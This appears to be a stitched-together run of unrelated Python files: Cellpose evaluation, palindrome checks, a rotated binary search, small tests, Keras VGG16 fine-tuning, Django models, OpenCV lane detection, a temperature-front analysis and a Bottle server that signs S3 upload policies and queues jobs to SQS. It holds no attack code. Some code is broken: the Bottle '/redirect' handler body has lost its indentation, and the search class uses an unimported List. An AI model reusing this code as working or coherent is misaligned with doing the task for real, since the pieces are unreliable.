        masks = cp_model.eval(test_data, channels=channels, rescale=rescale, net_avg=True, augment=True)[0]
        ap = metrics.average_precision(test_labels, masks,
                                       threshold=thresholds)[0]
        # mean AP at IoU thresholds 0.5, 0.75 and 0.9
        print(ap[:,[0,5,8]].mean(axis=0))
        aps[j] = ap
    return aps
def test_cellpose_kfold(data_root, save_root):
    """ test trained cellpose networks on all cyto images """
    device = mx.gpu()
    ntest = 68
    # five architecture variants; index k selects one column
    concatenation = [0, 0, 0, 1, 1]
    residual_on = [1, 1, 0, 1, 0]
    style_on = [1, 0, 1, 1, 0]
    channels = [2,1]
    # aps[fold, model, image, iou-threshold]; the model axis holds the 5
    # architecture ensembles in slots 0-4 and the 4 individual default
    # networks in slots 5-8 (see aps[j, m+5] below)
    aps = np.zeros((9,9,68,len(thresholds)))
    for j in range(9):
        train_root = os.path.join(data_root, 'train%d/'%j)
        model_root = os.path.join(train_root, 'models/')
        test_root = os.path.join(data_root, 'test%d/'%j)
        test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
        test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
        for k in range(len(concatenation)):
            pretrained_models = get_pretrained_models(model_root, 0, 3,
                                                      residual_on[k], style_on[k],
                                                      concatenation[k])
            print(pretrained_models)
            cp_model = models.CellposeModel(device=device,
                                            pretrained_model=pretrained_models)
            # test_root ends with '/' so concatenation forms a valid path
            dat = np.load(test_root+'predicted_diams.npy', allow_pickle=True).item()
            # rescale from predicted to the 30px reference diameter
            rescale = 30. / dat['predicted_diams']
            # 4-net ensemble for this architecture
            masks = cp_model.eval(test_data, channels=channels, rescale=rescale, net_avg=True, augment=False)[0]
            ap = metrics.average_precision(test_labels, masks,
                                           threshold=thresholds)[0]
            # mean AP at IoU thresholds 0.5, 0.75 and 0.9
            print(ap[:,[0,5,8]].mean(axis=0))
            aps[j,k] = ap
            if k==0:
                # run each of the default architecture's 4 nets singly
                for m, pretrained_model in enumerate(pretrained_models):
                    cp_model = models.CellposeModel(device=device,
                                                    pretrained_model=pretrained_model)
                    masks = cp_model.eval(test_data, channels=channels, rescale=rescale, net_avg=False, augment=False)[0]
                    ap = metrics.average_precision(test_labels, masks,
                                                   threshold=thresholds)[0]
                    print(ap[:,[0,5,8]].mean(axis=0))
                    aps[j,m+5] = ap
    np.save(os.path.join(save_root, 'ap_cellpose_all.npy'), aps)
def size_distributions(data_root, save_root):
    """Compute a size-distribution statistic per test image of every fold,
    save the (9, 68) array and return it."""
    ntest = 68
    sz_dist = np.zeros((9, ntest))
    for fold in range(9):
        fold_root = os.path.join(data_root, 'test%d/' % fold)
        for i in range(ntest):
            lbl = io.imread(os.path.join(fold_root, '%03d_masks.tif' % i))
            sz_dist[fold, i] = utils.size_distribution(lbl)
    np.save(os.path.join(save_root, 'size_distribution.npy'), sz_dist)
    return sz_dist
|
#!/usr/bin/env python
from __future__ import (absolute_import, division, print_function, unicode_literals)
# Read a string and report whether it is a palindrome.
try:
    # Python 2 compatibility: raw_input was renamed to input in Python 3,
    # so the bare raw_input() call crashed with NameError on Python 3.
    text_input = raw_input
except NameError:
    text_input = input
s = text_input("Please enter a string: ")
# a string is a palindrome iff it equals its own reversal
if s == s[::-1]:
    print("The string is a palindrome")
else:
    print("The string is not a palindrome")
|
# Use a deque to check whether a string is a palindrome
from pythonds.basic.deque import Deque
def fixhwnum(string):
    """Return True when ``string`` reads the same forwards and backwards.

    Uses the standard-library ``collections.deque`` instead of the
    third-party pythonds Deque: pop one character from each end and
    compare until the ends meet.
    """
    from collections import deque  # stdlib replacement for pythonds.Deque
    chars = deque(string)
    while len(chars) > 1:
        if chars.popleft() != chars.pop():
            return False
    return True
# demo: one palindrome, one non-palindrome
for example in ('abcdcba', 'afdefdfa'):
    print(fixhwnum(example))
class Solution:
    """Search for a target value in a rotated sorted array."""

    def search(self, nums: List[int], target: int) -> int:
        """Return the index of ``target`` in ``nums`` (no duplicates
        assumed), or -1 when absent.

        Classic rotated binary search: at least one half around the
        midpoint is sorted, so use that half's end values to decide
        which side can contain the target.
        """
        lo, hi = 0, len(nums) - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            if nums[mid] == target:
                return mid
            if nums[mid] < nums[hi]:
                # right half [mid..hi] is sorted
                if nums[mid] < target <= nums[hi]:
                    lo = mid + 1
                else:
                    hi = mid - 1
            else:
                # left half [lo..mid] is sorted
                if nums[lo] <= target < nums[mid]:
                    hi = mid - 1
                else:
                    lo = mid + 1
        return -1
"""
二分搜索法的关键在于获得了中间数后,判断下面要搜索左半段还是右半段,
我们可以观察出规律,如果中间的数小于最右边的数,则右半段是有序的,若中间数大于最右边数,则左半段是有序的,
我们只要在有序的半段里用首尾两个数组来判断目标值是否在这一区域内,这样就可以确定保留哪半边了,
""" |
#
# Copyright (c) 2022, Gabriel Linder <linder.gabriel@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
from dargor.coalesce import coalesce
def div(a: int, b: int) -> float:
    """Return a divided by b; raises ZeroDivisionError when b == 0."""
    return a / b
def test_ok() -> None:
    """When div succeeds, coalesce returns its result (13), not the 42."""
    assert coalesce(42, div, 13, 1) == 13
def test_ko() -> None:
    """div(13, 0) raises ZeroDivisionError, so coalesce falls back to 42."""
    assert coalesce(42, div, 13, 0) == 42
|
# Read five grades, then print the list, their sum and their mean.
scores = []
for _ in range(5):
    value = int(input("성적입력 : "))
    scores.append(value)
print(scores)  # echo the list of entered grades
# Use a distinct name and the builtin: the original `sum = 0` accumulator
# shadowed the built-in sum() for the rest of the module.
total = sum(scores)
print("합계: ", total)
print("평균: ", (total / 5))
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 29 23:44:31 2021
@author: -
"""
# -- coding:utf-8 --
import pandas as pd
import numpy as np
import os
from os.path import join as pjoin
# from utils import is_number
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
import xgboost as xgb
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from matplotlib import pyplot as plt
from matplotlib.colors import ListedColormap
from imblearn.over_sampling import SMOTE
#Impute Libraries
from sklearn.impute import KNNImputer
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.impute import IterativeImputer as MICE
from sklearn import metrics
from sklearn.metrics import classification_report
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.impute import SimpleImputer
import xgboost as xgb
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report,confusion_matrix
#Import SVM
from sklearn.svm import SVC
#Import library for logistic regression
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import VotingClassifier
from sklearn.metrics import classification_report,confusion_matrix
from sklearn.ensemble import VotingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import roc_curve,auc
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_predict
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn import metrics
from sklearn.metrics import recall_score
from sklearn.metrics import make_scorer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_score,accuracy_score
from sklearn.metrics import f1_score
import numpy as np
from math import *
from sklearn.model_selection import cross_val_score
from sklearn import metrics
from sklearn.metrics import recall_score
from sklearn.metrics import accuracy_score
from sklearn.metrics import make_scorer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_score,accuracy_score
from sklearn.metrics import f1_score
from sklearn import preprocessing
from imblearn.over_sampling import RandomOverSampler
from imblearn.over_sampling import SMOTE
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier #RandomForestRegressor
from sklearn.ensemble import ExtraTreesClassifier
import xgboost as xgb
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_predict
from sklearn.preprocessing import MinMaxScaler
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import classification_report,confusion_matrix
from sklearn.ensemble import VotingClassifier
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn import metrics
from sklearn.metrics import recall_score
from sklearn.metrics import accuracy_score
from sklearn.metrics import make_scorer
from sklearn.metrics import precision_score,accuracy_score
from sklearn.metrics import f1_score
from sklearn import preprocessing
lb = preprocessing.LabelBinarizer()
from imblearn.over_sampling import SMOTE
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import train_test_split
from math import *
import sys
import sklearn.neighbors._base
sys.modules['sklearn.neighbors.base'] = sklearn.neighbors._base
from missingpy import MissForest
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve, auc
import matplotlib as mpl
from scipy import interp
import sweetviz as sv
#%matplotlib inline |
# encoding=utf-8
# Date: 2018-10-14
# Author: MJUZY
# Important Referrence:
# https://blog.csdn.net/zpalyq110/article/details/80432827
# https://github.com/Freemanzxp/Image-category-understanding-and-application/blob/master/main/MedicalLargeFine_tuning.py
import os
from keras.preprocessing.image import ImageDataGenerator
from Prepare import base_dir
# Directory layout provided by Prepare.base_dir: train/validation/test subdirs.
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
# Training images are augmented (rotation/shift/shear/zoom/flip) and
# rescaled from [0, 255] to [0, 1].
train_datagen = ImageDataGenerator(
    rescale=1. / 255,
    rotation_range=40,
    width_shift_range=0.2,
    height_shift_range=0.2,
    shear_range=0.2,
    zoom_range=0.2,
    horizontal_flip=True,
    fill_mode='nearest')
# Validation images are only rescaled -- no augmentation.
test_datagen = ImageDataGenerator(rescale=1. / 255)
# Both generators yield batches of 20 images resized to 224x224 (the VGG16
# input size) with one-hot ('categorical') class labels.
train_generator = train_datagen.flow_from_directory(
    train_dir,
    target_size=(224, 224),
    batch_size=20,
    class_mode='categorical')
validation_generator = test_datagen.flow_from_directory(
    validation_dir,
    target_size=(224, 224),
    batch_size=20,
    class_mode='categorical')
from keras.applications import VGG16
from keras.models import Model
from keras.layers import Dense, Flatten
from keras import optimizers
# Load the full VGG16 (include_top=True) from a local weights file.
model = VGG16(weights='vgg16_weights_tf_dim_ordering_tf_kernels.h5',
              include_top=True)
# Attention: Pop the layers from the bottom layer to the shallow layer
# NOTE(review): eight pops appear to strip the classifier head plus the
# last conv block; mutating model.layers via pop() relies on old-Keras
# behaviour -- confirm it actually detaches layers in this Keras version.
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
model.layers.pop()
# re-point the model output at the new last layer
model.outputs = [model.layers[-1].output]
x = Flatten()(model.layers[-1].output) # Attention: Very important operation------------------------------------------!
x = Dense(256, activation='relu')(x) # Attention: This is a really strange script structure------------------------!
x = Dense(8, activation='softmax')(x)  # 8-way clothes classifier head
# rebuild a model from the original input to the new head
model = Model(model.input, x)
# freeze the first 9 layers; only deeper layers are fine-tuned
for layer in model.layers[:9]:
    layer.trainable = False
model.compile(optimizer=optimizers.RMSprop(lr=2e-5),
              loss='categorical_crossentropy',
              metrics=['acc'])
model.summary()
# 100 steps x batch 20 = 2000 images per epoch, for 40 epochs
history = model.fit_generator(
    train_generator,
    steps_per_epoch=100, # Stands for the total times of the training loop
    epochs=40,
    validation_data=validation_generator,
    validation_steps=50)
model.save('VGG16FineTune_8_Clothes_Classes_CutSomelayers.h5')
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and Validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
""" Appendix :
Layer (type) Output Shape Param #
=================================================================
input_1 (InputLayer) (None, 224, 224, 3) 0
_________________________________________________________________
block1_conv1 (Conv2D) (None, 224, 224, 64) 1792
_________________________________________________________________
block1_conv2 (Conv2D) (None, 224, 224, 64) 36928
_________________________________________________________________
block1_pool (MaxPooling2D) (None, 112, 112, 64) 0
_________________________________________________________________
block2_conv1 (Conv2D) (None, 112, 112, 128) 73856
_________________________________________________________________
block2_conv2 (Conv2D) (None, 112, 112, 128) 147584
_________________________________________________________________
block2_pool (MaxPooling2D) (None, 56, 56, 128) 0
_________________________________________________________________
block3_conv1 (Conv2D) (None, 56, 56, 256) 295168
_________________________________________________________________
block3_conv2 (Conv2D) (None, 56, 56, 256) 590080
_________________________________________________________________
block3_conv3 (Conv2D) (None, 56, 56, 256) 590080
_________________________________________________________________
block3_pool (MaxPooling2D) (None, 28, 28, 256) 0
_________________________________________________________________
block4_conv1 (Conv2D) (None, 28, 28, 512) 1180160
_________________________________________________________________
block4_conv2 (Conv2D) (None, 28, 28, 512) 2359808
_________________________________________________________________
block4_conv3 (Conv2D) (None, 28, 28, 512) 2359808
_________________________________________________________________
block4_pool (MaxPooling2D) (None, 14, 14, 512) 0
_________________________________________________________________
flatten_1 (Flatten) (None, 100352) 0
_________________________________________________________________
dense_1 (Dense) (None, 256) 25690368
_________________________________________________________________
dense_2 (Dense) (None, 8) 2056
=================================================================
Total params: 33,327,688
Trainable params: 32,182,280
Non-trainable params: 1,145,408
_________________________________________________________________
Epoch 1/40
""" |
from django.db import models
from django.utils import timezone
# Create your models here.
class City(models.Model):
    """A named city; displayed by its name."""
    name = models.CharField(max_length=25)

    def __str__(self):
        return self.name

    class Meta:
        # Avoid Django's default pluralization "citys" in the admin.
        verbose_name_plural = 'cities'
class Data(models.Model):
    """Export configuration: which sensor fields to include and the day span."""
    # NOTE(review): evaluated once at class-definition (import) time, so every
    # instance shares the same default filename timestamp -- confirm intended.
    name = f'{str(timezone.now()).replace(" ", "_")}_export.json'
    export_name = models.CharField(max_length=int(len(name) + 5), default=name)
    span_int = models.IntegerField(name="span_int", default=7)
    wind_direction = models.BooleanField(name='wind_direction', default=False)
    avg_wind_speed = models.BooleanField(name="avg_wind_speed", default=False)
    wind_gust = models.BooleanField(name="wind_gust", default=False)
    rainfall = models.BooleanField(name="rainfall", default=False)
    humidity = models.BooleanField(name="humidity", default=False)
    ambient_temp = models.BooleanField(name="ambient_temp", default=False)
    ground_temp = models.BooleanField(name="ground_temp", default=False)
    pressure = models.BooleanField(name="pressure", default=False)
    timestamps = models.BooleanField(name="timestamps", default=False)

    def export(self):
        # Placeholder: export logic not implemented yet.
        pass

    def __str__(self):
        # __str__ must return a single str; the original returned a tuple,
        # which raises TypeError whenever the object is rendered.
        return (f'{self.export_name} span={self.span_int} '
                f'wind_direction={self.wind_direction} '
                f'avg_wind_speed={self.avg_wind_speed} '
                f'wind_gust={self.wind_gust} rainfall={self.rainfall} '
                f'humidity={self.humidity} ambient_temp={self.ambient_temp} '
                f'ground_temp={self.ground_temp} pressure={self.pressure} '
                f'timestamps={self.timestamps}')
class Config(models.Model):
    """Placeholder configuration model; no fields defined yet."""

    def __str__(self):
        # __str__ must return a str; returning None (the original behavior)
        # raises TypeError when the object is rendered.
        return 'Config'
|
import numpy as np
import cv2
#creating a function to convert the RGB image to Grayscale
def RGBtoGray(image):
    """Convert an RGB image to single-channel grayscale."""
    return cv2.cvtColor(image,cv2.COLOR_RGB2GRAY)
#creating a function for Smoothing the Grayscale image
def smoothing(image,kernel_size):
    """Gaussian-blur the image with a square kernel_size x kernel_size kernel."""
    return cv2.GaussianBlur(image,(kernel_size,kernel_size),0)
#this creates a canny edge detector image
def detected_edges(image,low_threshold,high_threshold):
    """Run the Canny edge detector with the given hysteresis thresholds."""
    return cv2.Canny(image,low_threshold,high_threshold)
#creating a mask to just run the Canny Edge detector in the region of the image where we have the lanes
def mask_image(image, vertices, cvtToColor):
    """Keep only the polygonal region of interest of an image.

    Fills the polygon(s) described by *vertices* with *cvtToColor* on a
    black mask the same shape as *image*, then ANDs it with the image so
    everything outside the polygon becomes zero.
    """
    # zeros_like already yields all zeros; the original's "* 0" was redundant.
    mask = np.zeros_like(image)
    mask = cv2.fillPoly(mask, vertices, cvtToColor)
    return cv2.bitwise_and(image, mask)
# Lane-detection pipeline: read each video frame, find edges, mask the
# left/right lane regions, fit one straight line per side with a Hough
# transform + least squares, and write the annotated video out.
cap = cv2.VideoCapture('test_videos/solidYellowLeft.mp4')
fourcc = cv2.VideoWriter_fourcc(*'DIVX')
out = cv2.VideoWriter('test_videos_output/solidYellowLeft.mp4', fourcc, 25, (960, 540))
while(cap.isOpened()):
    ret, frame = cap.read()
    if not ret:
        break
    ##Main Code
    image1_gray = RGBtoGray(frame)
    image1_gray_smoothed = smoothing(image1_gray,7)
    edges_image1 = detected_edges(image1_gray_smoothed,20,75)
    ##finds lines on the right side of the image
    # Two hard-coded trapezoids: vertices[0] masks the right lane region,
    # vertices[1] the left (coordinates tuned for a 960x540 frame).
    vertices = np.array([[[(480,539),(900,539),(480,285),(490,285)]],[[(500,539),(80,539),(490,285),(500,285)]]])
    edges_r = mask_image(edges_image1,(vertices[0]),255)
    edges_l = mask_image(edges_image1,(vertices[1]),255)
    d=1
    theta = np.pi/180
    max_length = 50
    min_gap = 10
    pixel_no = 10 #no of pixels that will be used to plot the lines
    alpha = 1.5
    beta = 0.8
    gamma = 0
    # NOTE(review): HoughLinesP's positional parameters after theta are
    # (threshold, lines, minLineLength, maxLineGap); here max_length lands on
    # threshold and min_gap on the `lines` output slot -- confirm intended.
    HL_r = cv2.HoughLinesP(edges_r,d,theta,max_length,min_gap) #right lane
    HL_l = cv2.HoughLinesP(edges_l,d,theta,max_length,min_gap) #left lane
    s_r = HL_r.shape[0]
    s_l = HL_l.shape[0]
    # Blank canvas the lane lines get drawn onto (cv2.line mutates it).
    b = np.zeros_like(frame)*0
    ##to detect the right-lanes
    x1 = np.ones((s_r),dtype='int32')
    x2 = np.ones((s_r),dtype='int32')
    y1 = np.ones((s_r),dtype='int32')
    y2 = np.ones((s_r),dtype='int32')
    # Collect the endpoints of every detected Hough segment.
    for i in range(s_r):
        j=0
        x1[i] = (HL_r[i][0][j])
        x2[i]= (HL_r[i][0][j+2])
        y1[i] = (HL_r[i][0][j+1])
        y2[i] = (HL_r[i][0][j+3])
    X1 = np.hstack((x1,x2))
    Y1 = np.hstack((y1,y2))
    # Fit one straight line (degree-1 polynomial) through all endpoints.
    lane_right = np.polyfit(X1,Y1,1)
    x1_new = np.linspace(500,900,500)
    y1_new = np.polyval(lane_right,x1_new)
    y1_min = int(np.min(y1_new))
    y1_max = int(np.max(y1_new))
    point1_1 = (500,y1_min)
    point2_1 = (900,y1_max)
    lines_right = cv2.line(b,point1_1,point2_1,(0,0,255),pixel_no)
    # NOTE(review): final_right is never used -- the left-lane addWeighted
    # below produces the displayed frame (b already carries both lines).
    final_right = cv2.addWeighted(lines_right,alpha,frame,beta,gamma)
    ##to detect the left-lanes
    x3 = np.ones((s_l),dtype='int32')
    x4 = np.ones((s_l),dtype='int32')
    y3 = np.ones((s_l),dtype='int32')
    y4 = np.ones((s_l),dtype='int32')
    for i in range(s_l):
        j=0
        x3[i] = (HL_l[i][0][j])
        x4[i]= (HL_l[i][0][j+2])
        y3[i] = (HL_l[i][0][j+1])
        y4[i] = (HL_l[i][0][j+3])
    X2 = np.hstack((x3,x4))
    Y2 = np.hstack((y3,y4))
    lane_left = np.polyfit(X2,Y2,1)
    x2_new = np.linspace(80,450,500)
    y2_new = np.polyval(lane_left,x2_new)
    y2_min = int(np.min(y2_new))
    y2_max = int(np.max(y2_new))
    point1_2 = (80,y2_max)
    point2_2 = (450,y2_min)
    lines_left = cv2.line(b,point1_2,point2_2,(0,0,255),pixel_no)
    # Overlay both lane lines (accumulated in b) onto the original frame.
    frame = cv2.addWeighted(lines_left,alpha,frame,beta,gamma)
    out.write(frame)
    cv2.imshow('frame',frame)
    if cv2.waitKey(25) & 0xFF == ord('q'):
        break
cap.release()
out.release()
cv2.destroyAllWindows()
|
import numpy as np
from scipy import interpolate
import pandas as pd
import os
import time
import multiprocessing
import matplotlib.pyplot as plt
import sys
# Threshold temperature; the colorbar label below divides by 1000 and shows
# 'K', so this is 1500 K scaled x1000 to match the integerized data units.
lower_T=1500
lower_T*=1000
# One input directory per simulation case.
paths = [r"a05",r"a10",r"a20",r"a40"]
file_end = '.txt'
def tt(files):
    """Worker: extract the temperature-front tip from one data file.

    files -- an (index, filename) tuple produced by enumerate() in getmin().
    Reads the module-level globals ``path``, ``tmppath`` and ``lower_T``;
    writes [min_x, y_at_min_x, front_angle_deg] to tmppath/<filename>.
    """
    dir_path = os.path.join(path, files[1])
    print(dir_path, files[0], time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
    # Raw strings for the regex separators (non-raw '\s+' warns on Python 3.12+).
    test = pd.read_csv(dir_path, header=None, skiprows=[0, 1], sep=r'\s+')
    xy = pd.read_csv('xy.dat', header=None, skiprows=[0, 1], sep=r'\s+')
    # Scale coordinates and temperature to integers (x,y presumably in
    # 1e-5 m units, T in mK -- the plot code divides by the same factors).
    nn = pd.concat([xy[0] * 100000, xy[1] * 100000, test[1] * 1000], axis=1)
    nn.columns = ['x', 'y', 'T']
    nn = nn.sort_values(by=['y', 'x'], ascending=True)
    nn.reset_index(drop=True, inplace=True)
    # np.int was removed in NumPy 1.24; the builtin int is the documented
    # equivalent dtype.
    nn = pd.DataFrame(data=nn, dtype=int)
    # First x-index per scan line (y) whose temperature reaches the threshold.
    tmp = nn[(nn['T'] >= lower_T)].groupby('y')['x'].idxmin()
    # Renamed from `tt` to avoid shadowing this function's own name.
    front = []
    for i in tmp:
        # Only interpolate when the previous point lies on the same scan line.
        if nn.loc[i, :]['y'] == nn.loc[i - 1, :]['y']:
            b = nn.loc[i, :]
            s = nn.loc[i - 1, :]
            # Linear interpolation to the exact threshold crossing.
            xd = (lower_T - s['T']) / (b['T'] - s['T']) * (b['x'] - s['x']) + s['x']
            front.append([xd, b['y']])
    front = pd.DataFrame(front, columns=['x', 'y'])
    x = front['y']
    y = front['x']
    # Spline-smooth the front profile to locate its leading tip.
    spl = interpolate.splrep(x, y)
    x2 = np.arange(x.min(), x.max(), 0.1)
    y2 = interpolate.splev(x2, spl)
    xnew = y[:y.idxmin()]  # x
    ynew = x[:y.idxmin()]  # y
    ttt = [[y2.min(), x2[y2.argmin()], np.degrees(np.arctan((xnew.max() - xnew.min()) / (ynew.max() - ynew.min())))]]
    tttdir = os.path.join(tmppath, files[1])
    np.savetxt(tttdir, ttt)
def getmin(path):
    """Run tt() over every file in *path* using a process pool."""
    filelist = os.listdir(path)
    pool = multiprocessing.Pool()
    for files in enumerate(filelist):
        # tt receives the whole (index, filename) tuple.
        pool.apply_async(tt,(files,))
    pool.close()
    pool.join()
def merge(path):
    """Concatenate all per-file worker results in tmppath into <path>.txt."""
    frames = []
    for i in os.listdir(tmppath):
        dir_path = os.path.join(tmppath, i)
        frames.append(pd.read_csv(dir_path, header=None, sep=r'\s+'))
    # DataFrame.append was removed in pandas 2.0; pd.concat is the
    # supported replacement (and avoids quadratic re-copying).
    tmp = pd.concat(frames) if frames else pd.DataFrame()
    np.savetxt(path + file_end, tmp)
def draw(path,lim):
    """Scatter-plot one case's merged results onto the current figure.

    lim is [xmax, xmin, ymax, ymin] accumulated across calls and is
    mutated in place so the caller can set shared axis limits.
    """
    nn = pd.read_csv(path + file_end, header=None, skiprows=[0, 1, 2], sep="\s+", )
    # Track global extremes across all cases.
    lim[0] = max(lim[0],nn[0].max())
    lim[1] = min(lim[1],nn[0].min())
    lim[2] = max(lim[2],nn[1].max())
    lim[3] = min(lim[3],nn[1].min())
    # Coordinates were stored scaled by 1e5; divide back to meters
    # (axis labels below are 'x/m' and 'y/m').
    plt.scatter(nn[0] / 100000, nn[1] / 100000, c=nn[2],cmap = 'coolwarm_r')
    plt.text(x=nn[0].min()/100000, y=nn[1].min()/100000, s=path, fontsize=15)
if __name__=='__main__':
    # Scratch directory for per-file worker outputs; emptied before use.
    tmppath = r'a20tmp'
    if not os.path.exists(tmppath):
        os.makedirs(tmppath)
    for i in os.listdir(tmppath):
        dir_path = os.path.join(tmppath,i)
        os.remove(dir_path)
    # Extract fronts for each case, merge the worker files, then clear
    # the scratch directory for the next case.
    for path in paths:
        getmin(path)
        merge(path)
        for i in os.listdir(tmppath):
            dir_path = os.path.join(tmppath,i)
            os.remove(dir_path)
    os.removedirs('a20tmp')
    # lim = [xmax, xmin, ymax, ymin] accumulator mutated by draw().
    lim = [-sys.maxsize, sys.maxsize, -sys.maxsize, sys.maxsize]
    for path in paths:
        draw(path, lim)
    cb = plt.colorbar()
    cb.set_label('Angle/degree at Temperatur' + str(lower_T / 1000) + 'K')
    # Hard-coded plot window; the commented lines below would instead
    # derive it from the accumulated lim values.
    plt.xlim(1.7e-4, 3e-4)
    plt.ylim(0.006, 0.013)
    # plt.xlim((lim[1] - 1) / 100000, (lim[0] + 1) / 100000)
    # plt.ylim((lim[3] - 10) / 100000, (lim[2] + 10) / 100000)
    plt.grid(linestyle='-', color='0.5', linewidth=2)
    plt.xlabel('x/m')
    plt.ylabel('y/m')
    plt.savefig('final')
    plt.show()
|
from bottle import route, run, static_file, response, template
import bottle
import boto
import json
import boto.sqs
import string
import uuid, time
import boto.dynamodb2 as ddb
from boto.dynamodb2.fields import HashKey
from boto.dynamodb2.table import Table
import base64, hmac, hashlib
import urllib2
from boto.sqs.message import RawMessage
# AWS service connections; credentials come from the boto environment/config.
conn = boto.connect_s3()
sns = boto.connect_sns()
sqs = boto.connect_sqs()
# this must be changed
# redirect_url = 'http://ec2-52-2-66-81.compute-1.amazonaws.com:8888/annotator/run'
# S3 redirects the browser here after a successful direct upload.
redirect_url = 'http://lyc.ucmpcs.org:8888/redirect'
# for debugging
@route('/')
def index():
    """Landing page used to verify the server is up."""
    return "Welcome to Web Server!"
# upload file using form
@route('/upload', method='GET')
def upload_file_to_s3():
    """Render the S3 direct-upload form with a signed POST policy.

    The browser uploads straight to the 'gas-inputs' bucket; on success
    S3 redirects to /redirect with bucket and key in the query string.
    NOTE(review): base64/hmac over str objects implies Python 2 -- on
    Python 3 these calls require bytes.
    """
    # define S3 policy document
    policy = """{"expiration":"2016-07-17T12:00:00.000Z",
"conditions":
[{"bucket":"gas-inputs"},
["starts-with", "$key", "lyc/"],
{"acl": "private"},
["starts-with", "$success_action_redirect","http://lyc.ucmpcs.org:8888/redirect"],
{"x-amz-algorithm": "AWS2-HMAC-SHA1"}
]
}"""
    # encode and sign policy document
    encoded_policy = base64.b64encode(policy)
    signature = base64.b64encode(hmac.new(conn.aws_secret_access_key, encoded_policy, hashlib.sha1).digest())
    # Generate a unique job ID
    jobID = str(uuid.uuid4())
    # render 'upload.tpl' template and pass in variables
    return template('upload.tpl',bucket_name='gas-inputs', acl='private', algorithm='AWS2-HMAC-SHA1', aws_key=conn.aws_access_key_id, encoded_policy=encoded_policy, signature=signature, job_id = jobID, redirect_url=redirect_url)
@route("/redirect", method="GET")
def send_annotation_request():
# Get bucket name and key from the S3 redirect URL
bucket_name = bottle.request.query.bucket
key = bottle.request.query.key.split('/')[1] # jobID~test.txt
jobID = key.split('~')[0]
file_name = key.split('~')[1]
# Create a job item and persist it to the annotations database
ann_table = Table('lyc-annotations', schema=[HashKey('job_id')], connection = ddb.connect_to_region('us-east-1'))
data = {'job_id': jobID, 'username': 'lyc', 's3_inputs_bucket': bucket_name, 's3_key_input_file': 'lyc/'+key, 'input_file_name': file_name, 'submit_time': int(time.time()), 'status':'pending'}
ann_table.put_item(data=data)
###------------------------------------------------------------------###
## Create new request that includes the same data in the body
# url ="http://ec2-52-2-66-81.compute-1.amazonaws.com:8888/annotator/analysis"
# headers = {'Content-Type': 'application/json'}
# ann_request = urllib2.Request(url, json.dumps(data), headers)
## Send request (as an HTTP POST) to the annotator API
# annotator_response = urllib2.urlopen(ann_request)
## returns a response to the user containing the job ID and the filename
# return annotator_response
###------------------------------------------------------------------###
# publish a notification to the SNS topic
# http://ridingpython.blogspot.com/2011/11/aws-sns-how-to-send-out-messages-to-e.html
queue = sqs.get_queue('lyc-job-requests')
# publishes a notification to the SNS topic
m = RawMessage()
m.set_body(json.dumps(data))
queue.write(m)
# returns a response to the user containing the job ID and the filename
response = '{"code": "200 OK", "data": {"id": "%s", "input_file": "%s"}}' % (jobID, key)
return response
# gets a list of objects from your S3 input bucket
@route('/list_jobs', method='GET')
def display_files_in_s3():
    """Return a JSON object listing the S3 keys under the 'lyc' prefix.

    Response shape: {"files": ["lyc/...", ...]}.
    """
    # use boto to establish connection and get 'gas-inputs' bucket
    bucket = conn.get_bucket('gas-inputs', validate=False)
